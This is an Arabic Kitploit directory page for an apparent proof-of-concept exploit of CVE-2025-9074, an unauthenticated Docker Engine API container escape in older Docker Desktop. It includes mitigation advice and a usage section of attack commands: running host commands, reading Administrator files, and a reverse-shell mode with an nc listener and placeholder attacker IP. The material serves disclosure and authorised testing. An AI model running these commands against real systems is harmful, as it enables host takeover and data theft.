Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — إثبات المفهوم لاستغلال CVE-2025-9074 - هروب غير موثّق من حاوية Docker Engine API يؤثر على Docker Desktop < 4.44.3 على Windows و macOS (CVSS 9.3) | Kitploit
أدوات/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةالفريق الأحمرالهروب من الحاوية
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

CVE-2025-9074-Docker-Desktop-Container-Escape

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لاستغلال CVE-2025-9074 - هروب غير موثّق من حاوية Docker Engine API يؤثر على Docker Desktop < 4.44.3 على Windows و macOS (CVSS 9.3)

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

CVE-2025-9074: إثبات المفهوم للهروب من حاوية Docker Desktop

CVE CVSS Platform

إثبات المفهوم لثغرة CVE-2025-9074 - ثغرة حرجة للهروب من الحاوية في Docker Desktop تسمح بالوصول غير الموثّق إلى واجهة Docker Engine API.

نظرة عامة على الثغرة

الخاصيةالقيمة
معرف CVECVE-2025-9074
درجة CVSS9.3 (حرجة)
البرنامج المتأثرDocker Desktop < 4.44.3
المنصات المتأثرةWindows، macOS (Linux غير متأثر)
الإصدار المُصلَّحDocker Desktop 4.44.3+
المكتشفونFelix Boulet، Philippe Dugré
تاريخ الاكتشافمنتصف 2025
تاريخ التصحيح20 أغسطس 2025

التفاصيل الفنية

تسمح الثغرة للحاويات التي تعمل على Docker Desktop بالوصول إلى واجهة Docker Engine API على http://192.168.65.7:2375 بدون مصادقة. يحدث هذا بغض النظر عن:

  • إعدادات العزل المحسّن للحاويات (ECI)
  • تكوين "كشف الخادم الخفي على tcp://localhost:2375 بدون TLS"
  • أي إعدادات أمان أخرى

التأثير

  • Windows (مع WSL): سيطرة كاملة على النظام المضيف بامتيازات إدارية
  • macOS: التلاعب بالحاويات واحتمالية زرع باب خلفي (محدود بمطالبات المستخدم)
  • Linux: غير معرض (لأنه يستخدم مقبس Unix بدلاً من TCP)

السبب الجذري

تم كشف واجهة Docker Engine API على مقبس TCP يمكن الوصول إليه من داخل الحاويات، مما يسمح بـ:

  • إنشاء/حذف الحاويات
  • ربط أنظمة ملفات المضيف
  • تنفيذ أوامر بامتيازات
  • تجاوز تام لعزل الحاويات

الاستخدام

image

المتطلبات الأساسية

root@kitploit:~
pip3 install requests

وضع تنفيذ الأوامر

root@kitploit:~
# تنفيذ أمر على المضيف
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# قراءة الملفات من مضيف Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# سرد المستخدمين على Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

وضع شل عكسي

root@kitploit:~
# الطرفية 1: إعداد المستمع
nc -lvnp 4444

# الطرفية 2: تشغيل الأداة
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <عنوان_IP_الخاص_بك> -p 4444

# بعد الاتصال، نظام ملفات المضيف موجود في: /hostfs

من داخل حاوية

root@kitploit:~
# إذا كان لديك بالفعل وصول إلى حاوية
curl http://192.168.65.7:2375/version

سيناريو الهجوم

root@kitploit:~
graph TD
    A[حاوية خبيثة] -->|بدون مصادقة| B[واجهة Docker Engine API<br/>192.168.65.7:2375]
    B -->|إنشاء حاوية| C[حاوية بامتيازات]
    C -->|ربط نظام ملفات المضيف| D[وصول كامل للمضيف]
    D -->|قراءة/كتابة| E[اختراق النظام]

التخفيف

الإجراء الفوري المطلوب

قم بتحديث Docker Desktop إلى الإصدار 4.44.3 أو أحدث فوراً.

root@kitploit:~
# تحقق من إصدار Docker Desktop لديك
docker --version

# تحديث Docker Desktop
# Windows: التحميل من https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: التحميل من https://desktop.docker.com/mac/main/amd64/Docker.dmg

الحلول البديلة (مؤقتة)

إذا لم يكن التحديث الفوري ممكناً:

  1. تجنب تشغيل الحاويات غير الموثوقة
  2. مراقبة اتصالات الشبكة من الحاويات
  3. تنفيذ تجزئة الشبكة
  4. مراجعة جميع صور الحاويات قبل النشر

المراجع

  • تنبيه أمان Docker
  • NVD CVE-2025-9074
  • مدونة Felix Boulet
  • تحليل Philippe Dugré
  • إشعار GitHub

إخلاء المسؤولية

تم توفير هذه الأداة لأغراض تعليمية واختبارات أمنية مرخصة فقط.

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • لا يتحمل المؤلفون أي مسؤولية عن سوء استخدام هذه البرمجيات

الإشادات

  • اكتشاف الثغرة: Felix Boulet، Philippe Dugré
  • تطوير إثبات المفهوم: Amanja Francisco
  • فريق أمان Docker: للاستجابة السريعة والتصحيح

الترخيص

رخصة MIT - انظر ملف LICENSE للتفاصيل

تنزيل الأداة